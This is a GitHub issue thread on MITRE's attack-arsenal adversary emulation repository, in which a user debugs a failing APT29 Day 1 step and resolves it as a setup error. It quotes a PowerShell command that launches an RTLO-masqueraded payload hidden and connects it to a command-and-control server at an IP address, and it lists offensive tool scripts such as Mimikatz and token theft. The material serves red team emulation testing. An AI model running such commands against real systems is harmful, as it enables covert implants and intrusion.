search

mitre-attack / attack-arsenal

A collection of red team and adversary emulation resources developed and released by MITRE.
Apache License 2.0
485 stars 79 forks source link

Error on Day1 - RTLO Start Sandcat (T1036) #21

Closed Nexx1c closed 3 years ago

Nexx1c commented 3 years ago

Hi,

I'm getting an error stating that the payload wasn't found when running the ATT&CK Eval APT29 - Day 1 profile:

Sleep 3;$bin = Get-ChildItem *cod*scr*;$arguments = '-server "http://40.87.138.119:8888" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;}
__________________________
Payload(s) not available:

Most other actions seems to be working well: https://i.imgur.com/4z37FG5.png

The payload seems to exist in plugins/evals/payloads:

root@28323b9446f0:/usr/src/app/plugins/evals/payloads# ls
 2016_United_States_presidential_election_-_Wikipedia.html   StealToken.ps1            rar.exe                      stepSeventeen_zip.ps1
 File-Collection.ps1                                         cod.3aka.scr.exe          sandcat.go-windows           stepSixteen_SID.ps1
 Get-Screenshot.ps1                                          dmevals.local.pfx         sandcat.go-windows-upx       stepThirteen.ps1
 Invoke-BypassUACTokenManipulation.ps1                       invoke-winrmsession.ps1   schemas.ps1                  stepTwelve.ps1
 Invoke-Mimikatz.ps1                                         m.exe                     setup.py                     timestomp.ps1
 Invoke-PSInject.ps1                                         make_lnk.ps1              stepFifteen_wmi.ps1          update.ps1
 MITRE-ATTACK-EVALS.HTML                                     monkey.png                stepFourteen_bypassUAC.ps1   upload.ps1
 Modified-SysInternalsSuite.zip                              powerview.ps1             stepFourteen_credDump.ps1    wipe.ps1
 README.md                                                   ps.ps1                    stepSeventeen_email.ps1     ''$'\342\200\256''cod.3aka.scr.exe'

I'm running v 2.6.6 in a docker if that could be causing any issues?

Nexx1c commented 3 years ago

Found the issue.... Just wrote the IP without http:// and :port when running the setup.py... -_-